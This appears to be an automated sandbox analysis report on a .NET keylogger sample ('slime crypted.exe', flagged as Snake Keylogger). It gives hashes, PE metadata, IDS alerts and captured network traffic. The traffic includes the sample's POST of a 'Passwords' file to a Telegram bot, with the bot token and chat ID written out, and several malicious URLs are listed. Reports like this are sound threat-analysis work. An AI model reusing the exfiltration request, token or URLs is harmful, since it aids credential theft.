	ReanProject.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ReanProject.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://email.mg.decisiontime.online/c/eJxszjFvszAQgOFfYzbQ-c4mMHj4pK_M3TqDOZdTjR1hJyj_vkqVMeujd3hXZxnHi2_Y6Qv1hohgaHifJbbhyHu75n2W5M7z7Fb2UiSnKjt3OUVJ_CqjpJ9WVoeoxwEvL62PKz9VN5szGsd5AQoLgV-oZ2_1oPuFgrWAvWnEIaAFDaM2ZGHoAsy0DGwY2VpNoAzs328fottqvRZF_xROCqeyFV_flQonDLPC6c6HhEfr8_q0v9vmcB9xlsTdl8SS0__8qQyUfKsbH6ket1K7rfgkXeLa3B3-BgAA__-9dmXG	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	149.154.167.220
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\slime crypted.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1299
Entropy (8bit):	5.342376182732888
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4xLE4qE4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0H6
MD5:	D62639C5676A8FA1A0C2215824B6553A
SHA1:	544B2C6E7A43CE06B68DF441CC237AB7A742B5CD
SHA-256:	761379FF547D28D053F7683499D25F7F1B5523CC7262A2DA64AF26448F7E2D76
SHA-512:	5B46D1BDB899D8FA5C7431CA7061CDD1F00BE14CD53B630FAB52E52DA20F4B2BED405F932D7C0E9D74D84129D5BB5DE9B32CC709DA3D6995423E2ED91E92ACD3
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.804323608161306
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	slime crypted.exe
File size:	207'360 bytes
MD5:	b3fec0c78c0dd85b50c6d60d17e74b0b
SHA1:	8af77b3c5e287c31949d84d8a83c52ad5971ab4c
SHA256:	4120a4a8c8a1fb238464ad39e72baa8afcead746bab20e8979c427f09454df88
SHA512:	7b0c3f43416b9eb9f242a142a425620c7591d5275eddc28548639b4e15949a999572d80facc2a716b634d911e84255dedbee8d9868e3c176772944938d034449
SSDEEP:	3072:3cgoVTeYHfKL6q+GVqUxhioRHVTSZ1YhCpT6Fs+dQMl4ava:MNTlHw5qGi8VTShyvObav
TLSH:	5014E68273EC4192E9E9D5B3F0E0E57A6A3094C6F11A484293EE72E51FB91C76123D4F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l]...............0.. ...........?... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x433fae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC55D6CB5 [Wed Dec 5 11:17:09 2074 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
adc byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax+00000018h], al
push eax
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add dword ptr [eax], eax
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax+00h], ch
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x33f54	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0x5c6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x36000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x31fb4	0x32000	3993c41407e53e8787fb0d688762691c	False	0.7087109375	data	7.827723953918615	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x34000	0x5c6	0x600	754285404d91804bd0543ec69c843730	False	0.4186197916666667	data	4.1214991952205775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x36000	0xc	0x200	5fb778c350dce15afaef031de3383b70	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x340a0	0x33c	data			0.4166666666666667
RT_MANIFEST	0x343dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T15:01:57.461112+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	193.122.130.0	80	TCP
2025-01-13T15:02:05.429842+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49706	193.122.130.0	80	TCP
2025-01-13T15:02:06.075539+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49711	149.154.167.220	443	TCP
2025-01-13T15:02:06.470072+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.5	49711	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 15:01:56.740278959 CET	49706	80	192.168.2.5	193.122.130.0
Jan 13, 2025 15:01:56.745115042 CET	80	49706	193.122.130.0	192.168.2.5
Jan 13, 2025 15:01:56.745182037 CET	49706	80	192.168.2.5	193.122.130.0
Jan 13, 2025 15:01:56.753751993 CET	49706	80	192.168.2.5	193.122.130.0
Jan 13, 2025 15:01:56.758625984 CET	80	49706	193.122.130.0	192.168.2.5
Jan 13, 2025 15:01:57.281522989 CET	80	49706	193.122.130.0	192.168.2.5
Jan 13, 2025 15:01:57.307738066 CET	49706	80	192.168.2.5	193.122.130.0
Jan 13, 2025 15:01:57.312613964 CET	80	49706	193.122.130.0	192.168.2.5
Jan 13, 2025 15:01:57.408344984 CET	80	49706	193.122.130.0	192.168.2.5
Jan 13, 2025 15:01:57.427362919 CET	49707	443	192.168.2.5	104.21.48.1
Jan 13, 2025 15:01:57.427407026 CET	443	49707	104.21.48.1	192.168.2.5
Jan 13, 2025 15:01:57.427594900 CET	49707	443	192.168.2.5	104.21.48.1
Jan 13, 2025 15:01:57.461112022 CET	49706	80	192.168.2.5	193.122.130.0
Jan 13, 2025 15:01:57.491286039 CET	49707	443	192.168.2.5	104.21.48.1
Jan 13, 2025 15:01:57.491307020 CET	443	49707	104.21.48.1	192.168.2.5
Jan 13, 2025 15:01:57.950973034 CET	443	49707	104.21.48.1	192.168.2.5
Jan 13, 2025 15:01:57.951255083 CET	49707	443	192.168.2.5	104.21.48.1
Jan 13, 2025 15:01:58.029129028 CET	49707	443	192.168.2.5	104.21.48.1
Jan 13, 2025 15:01:58.029169083 CET	443	49707	104.21.48.1	192.168.2.5
Jan 13, 2025 15:01:58.029452085 CET	443	49707	104.21.48.1	192.168.2.5
Jan 13, 2025 15:01:58.086050034 CET	49707	443	192.168.2.5	104.21.48.1
Jan 13, 2025 15:01:58.290762901 CET	49707	443	192.168.2.5	104.21.48.1
Jan 13, 2025 15:01:58.331338882 CET	443	49707	104.21.48.1	192.168.2.5
Jan 13, 2025 15:01:58.407430887 CET	443	49707	104.21.48.1	192.168.2.5
Jan 13, 2025 15:01:58.407476902 CET	443	49707	104.21.48.1	192.168.2.5
Jan 13, 2025 15:01:58.407588959 CET	49707	443	192.168.2.5	104.21.48.1
Jan 13, 2025 15:01:58.543339014 CET	49707	443	192.168.2.5	104.21.48.1
Jan 13, 2025 15:02:05.282783031 CET	49706	80	192.168.2.5	193.122.130.0
Jan 13, 2025 15:02:05.287533045 CET	80	49706	193.122.130.0	192.168.2.5
Jan 13, 2025 15:02:05.384676933 CET	80	49706	193.122.130.0	192.168.2.5
Jan 13, 2025 15:02:05.396168947 CET	49711	443	192.168.2.5	149.154.167.220
Jan 13, 2025 15:02:05.396209002 CET	443	49711	149.154.167.220	192.168.2.5
Jan 13, 2025 15:02:05.396291018 CET	49711	443	192.168.2.5	149.154.167.220
Jan 13, 2025 15:02:05.396697998 CET	49711	443	192.168.2.5	149.154.167.220
Jan 13, 2025 15:02:05.396711111 CET	443	49711	149.154.167.220	192.168.2.5
Jan 13, 2025 15:02:05.429841995 CET	49706	80	192.168.2.5	193.122.130.0
Jan 13, 2025 15:02:06.028917074 CET	443	49711	149.154.167.220	192.168.2.5
Jan 13, 2025 15:02:06.029006004 CET	49711	443	192.168.2.5	149.154.167.220
Jan 13, 2025 15:02:06.031342983 CET	49711	443	192.168.2.5	149.154.167.220
Jan 13, 2025 15:02:06.031349897 CET	443	49711	149.154.167.220	192.168.2.5
Jan 13, 2025 15:02:06.031567097 CET	443	49711	149.154.167.220	192.168.2.5
Jan 13, 2025 15:02:06.033210039 CET	49711	443	192.168.2.5	149.154.167.220
Jan 13, 2025 15:02:06.075349092 CET	443	49711	149.154.167.220	192.168.2.5
Jan 13, 2025 15:02:06.075455904 CET	49711	443	192.168.2.5	149.154.167.220
Jan 13, 2025 15:02:06.075463057 CET	443	49711	149.154.167.220	192.168.2.5
Jan 13, 2025 15:02:06.470076084 CET	443	49711	149.154.167.220	192.168.2.5
Jan 13, 2025 15:02:06.470192909 CET	443	49711	149.154.167.220	192.168.2.5
Jan 13, 2025 15:02:06.470253944 CET	49711	443	192.168.2.5	149.154.167.220
Jan 13, 2025 15:02:06.470733881 CET	49711	443	192.168.2.5	149.154.167.220
Jan 13, 2025 15:03:10.384572983 CET	80	49706	193.122.130.0	192.168.2.5
Jan 13, 2025 15:03:10.384814024 CET	49706	80	192.168.2.5	193.122.130.0
Jan 13, 2025 15:03:38.524069071 CET	49706	80	192.168.2.5	193.122.130.0
Jan 13, 2025 15:03:38.529145956 CET	80	49706	193.122.130.0	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 15:01:56.727123022 CET	61924	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:01:56.734103918 CET	53	61924	1.1.1.1	192.168.2.5
Jan 13, 2025 15:01:57.418715954 CET	61616	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:01:57.426208973 CET	53	61616	1.1.1.1	192.168.2.5
Jan 13, 2025 15:02:05.388272047 CET	52674	53	192.168.2.5	1.1.1.1
Jan 13, 2025 15:02:05.395608902 CET	53	52674	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 15:01:56.727123022 CET	192.168.2.5	1.1.1.1	0xc87e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:57.418715954 CET	192.168.2.5	1.1.1.1	0xa038	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:02:05.388272047 CET	192.168.2.5	1.1.1.1	0x46ae	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 15:01:56.734103918 CET	1.1.1.1	192.168.2.5	0xc87e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 15:01:56.734103918 CET	1.1.1.1	192.168.2.5	0xc87e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:56.734103918 CET	1.1.1.1	192.168.2.5	0xc87e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:56.734103918 CET	1.1.1.1	192.168.2.5	0xc87e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:56.734103918 CET	1.1.1.1	192.168.2.5	0xc87e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:56.734103918 CET	1.1.1.1	192.168.2.5	0xc87e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:57.426208973 CET	1.1.1.1	192.168.2.5	0xa038	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:57.426208973 CET	1.1.1.1	192.168.2.5	0xa038	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:57.426208973 CET	1.1.1.1	192.168.2.5	0xa038	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:57.426208973 CET	1.1.1.1	192.168.2.5	0xa038	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:57.426208973 CET	1.1.1.1	192.168.2.5	0xa038	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:57.426208973 CET	1.1.1.1	192.168.2.5	0xa038	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:01:57.426208973 CET	1.1.1.1	192.168.2.5	0xa038	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 15:02:05.395608902 CET	1.1.1.1	192.168.2.5	0x46ae	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	193.122.130.0	80	4220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 15:01:56.753751993 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 15:01:57.281522989 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:01:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee5ba053eb3c9661416bebbf45e1979c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 15:01:57.307738066 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 15:01:57.408344984 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:01:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2cf3f37f5387de9218c21ef64d49420b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 15:02:05.282783031 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 15:02:05.384676933 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:02:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5e4ae3581bd6f669d269171852aa563b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	104.21.48.1	443	4220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:01:58 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 14:01:58 UTC	865	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:01:58 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2091707 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzrY%2FLPPVO%2FRQhcoQQH%2FW%2FLOsmD%2F3nFijaQaUuwRFJsBPaWYIBdypoPgjv3HkuS0%2BMQHU9kRIoKBs7v2KqUI42JlHxeB4VrZVuCtttu0Ia4Yp7N%2F7LJvIJAXK%2BvVVOjmxHsmC6NQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015ebdb9cc743be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1550&rtt_var=596&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1811414&cwnd=229&unsent_bytes=0&cid=8651094ac90e27b2&ts=467&x=0"
2025-01-13 14:01:58 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	149.154.167.220	443	4220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:02:06 UTC	296	OUT	POST /bot7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees/sendDocument?chat_id=7832108732&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33b0f3248bb0 Host: api.telegram.org Content-Length: 1088 Connection: Keep-Alive
2025-01-13 14:02:06 UTC	1088	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 30 66 33 32 34 38 62 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33b0f3248bb0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-13 14:02:06 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 14:02:06 GMT Content-Type: application/json Content-Length: 515 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-13 14:02:06 UTC	515	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 30 30 30 39 34 32 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6c 69 6d 65 65 67 77 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 38 33 32 31 30 38 37 33 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6c 69 6d 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 37 36 39 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74 Data Ascii: 